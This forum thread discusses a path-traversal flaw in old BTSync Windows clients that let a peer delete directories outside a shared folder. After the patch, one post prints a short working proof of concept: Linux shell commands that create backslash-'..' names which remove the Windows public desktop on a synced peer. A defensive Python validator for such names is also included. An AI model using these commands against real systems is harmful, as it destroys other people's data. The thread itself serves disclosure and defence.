[SOLVED] STOP YOUR WINDOWS CLIENT NOW


rdebath


If you have any public shares running now REMOVE THEM.

BTSync will delete directories outside the share.

[HOWTO Section Deleted]

It should be possible to use this to delete ANY directory on the Windows machine.

Bad examples are obvious!

THIS IS ALPHA SOFTWARE, IT WILL HAVE SERIOUS BUGS.

PS: This applies to versions below 1.0.130


Downloaded the Windows client today, did a few searches, found the Short, insecure "secrets" thread, and the cats secret (R27WAH4LQCGDFOGS7NLQYLQPXW5TRCW5) which I put in a New Folder on my desktop. After an hour or two of downloading, lots of cat pictures, I noticed a folder called "Hello" being created and deleted on my desktop. It didn't contain anything but its very presence indicates a glitch that allows somebody to create/delete files/folders one directory higher than the one they're linked to.

Is this the security issue OP describes? I have shut down and uninstalled Sync.


May I ask how? Would you have to craft a special packet to send like:-

Please remove ..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\System32\Drivers\etc\hosts

Or can you literally just say:-

Please remove C:\Windows\System32\Drivers\etc\hosts

Or what?

It's kinda like the first one, no absolute paths, but you don't have to decrypt any packets to do it. The "exploit code" is very very short.

Too short for me to give too many hints, without giving people a chance to see this thread.


I'm on 1.0.116 and when I click check for update it says I'm good? What's the deal?

New builds are presently announced on the forum in the first instance, and will then become available through the "Check for update" button/auto update function at a later stage.

The download on the main website has also been updated to build 1.0.130

  • 3 weeks later...

Okay, 20 days, not too bad: here and here ⟹ c&p pm

[HOWTO Section SHOWN]

With a share that has both Linux and Windows 7 hosts, on the Linux machine run these commands:

$ mkdir '..\..\..\Users\Public\Desktop'

$ echo test > '..\..\..\Users\Public\Desktop'/Testfile.txt

NOTICE the use of backslashes, not forward slashes.

The Windows shared desktop directory will be removed.

Its contents may be moved to another directory on the machine.

Be careful out there!

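The names in the HOWTO above contain backslashes, which are ordinary filename characters on Linux and path separators on Windows. The following Python check is an added example, not part of the thread and not BTSync's code: it evaluates a peer-supplied relative name under both rule sets and refuses names that leave the share under Windows rules. The function names and the `C:\Users\me\Sync` share root are assumptions made for illustration.

```python
import ntpath
import posixpath

def escapes_share_posix(rel: str) -> bool:
    """POSIX rules: only '/' separates components, so '\\' is just a filename character."""
    norm = posixpath.normpath(rel)
    return norm.startswith("/") or norm == ".." or norm.startswith("../")

def escapes_share_windows(rel: str) -> bool:
    """Windows rules: '/' and '\\' both separate; drive/UNC prefixes and rooted paths escape too."""
    drive, _ = ntpath.splitdrive(rel)
    norm = ntpath.normpath(rel)  # folds '/' into '\\' and collapses 'a\\..' pairs
    return bool(drive) or norm.startswith("\\") or norm == ".." or norm.startswith("..\\")

def safe_join_windows(share_root: str, rel: str) -> str:
    """Map a peer-supplied relative name into share_root, refusing names that land outside it."""
    if escapes_share_windows(rel):
        raise ValueError(f"name leaves the share under Windows rules: {rel!r}")
    return ntpath.normpath(ntpath.join(share_root, rel))

def audit_names(names):
    """Names a POSIX peer treats as in-share but a Windows peer would resolve outside it."""
    return [n for n in names if not escapes_share_posix(n) and escapes_share_windows(n)]

# Constructed sample input; the first name is the one from the HOWTO post.
SAMPLE = [
    "..\\..\\..\\Users\\Public\\Desktop/Testfile.txt",
    "cats/tabby.jpg",
    "notes\\..\\readme.txt",
    "../outside.txt",
]

if __name__ == "__main__":
    root = "C:\\Users\\me\\Sync"  # assumed share root
    for name in SAMPLE:
        try:
            print("accept", safe_join_windows(root, name))
        except ValueError as err:
            print("reject", err)
    print("passes POSIX check, fails Windows check:", audit_names(SAMPLE))
```

Running `audit_names` over the file list on the Linux side of a mixed share flags exactly the names that only become traversal on the Windows side.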
  • 4 weeks later...

What happens when I update a BTSync installation?

Do the sync folders need to be relinked (new secret and new hashing)?

I'm not quite sure how this relates in any way to this particular thread?!! :wacko:

Please post your questions in a relevant thread, or if no relevant thread already exists in the forum, feel free to create a new one. Your post here bears no relevance to the subject matter of this particular thread, which had - until your post - been dormant for almost a month!



This topic is now archived and is closed to further replies.